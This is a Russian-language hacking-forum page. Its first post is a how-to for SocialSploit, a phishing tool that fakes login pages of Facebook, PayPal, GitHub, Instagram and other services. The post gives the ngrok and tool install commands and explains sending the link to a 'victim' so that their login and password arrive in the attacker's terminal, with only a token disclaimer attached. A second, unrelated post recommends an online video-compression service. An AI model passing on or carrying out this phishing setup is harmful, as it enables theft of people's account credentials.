SocialSploit - утилита при помощи, которой можно создать фишинг таких социальных сетей как: Facebook, Awaker, Spotify, Netflix, Hotmail, Tuenti, Yahoo, PayPal, GitHub, Snapchat, Instagram и YouTube.

 

Установка:

Сначала нам понадобится Ngrok:

   apt-get update && apt-get upgrade -y

   apt-get install git -y

   git clone https://github.com/t...ermux-ngrok.git

   cd termux-ngrok

   chmod +x termux-ngrok.sh

   ./termux-ngrok.sh

 

После загрузки пишем "Y" и нажимаем Enter, после чего вводим либо "ngrok http 5555" либо "ngrok http 80". 

 

Переходим к установке SocialSploit: 

   pkg update

   pkg install python

   pkg install git

   git clone https://github.com/C...ocialSploit.git

   cd SocialSploit

   bash install.sh

 

Использование:

   ./Sploit

 

Далее выбираем жертву, копируем полученную ссылку и отправляем ей. После того, как жертва перейдет по ссылке и введет логин и пароль, мы получим его в терминале. 

 

На данный момент это один из лучших инструментов для фишинга, он функционален и очень удобен, что является невероятно важным при работе с ним.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28264 Сжимаем видео без потери его качества!

Отправлено по roguevad   15 Сентябрь 2021 - 12:26 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать вам о способе сжатия любого видео без потери качества. На сегодняшний день проблема качества видео уже не стоит так остро, так как практически любой девайс имеет достаточно хорошую камеру. Сегодня наиболее остро встает вопрос о весе подобного качественного видео. Для уменьшения размера подобных видео  без потери качества, мы рекомендуем вам использовать сервис,  который урежет размер видео на 30-90% от первоначального размера, что весьма неплохо.

 

Данный сервис называется YourCompress. Сервис полностью бесплатен и отлично сжимает видео без особой потери качества. Поддерживает файлы до 500 МБ.

 

 

1. Первым делом нам необходимо перейти по ссылке.

2. Затем нажимаем "Select file...", выбираем видео и нажимаем "Upload File & Compress"

3. После чего нам нужно нажать на "Download" и радоваться полученному результату.

 

Отличный способ уменьшить вес видео и не потерять хорошее качество. Если у вас мало места на дисках, флешках и телефоне, то этот сервис именно то, то вам необходимо, пользуйтесь!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.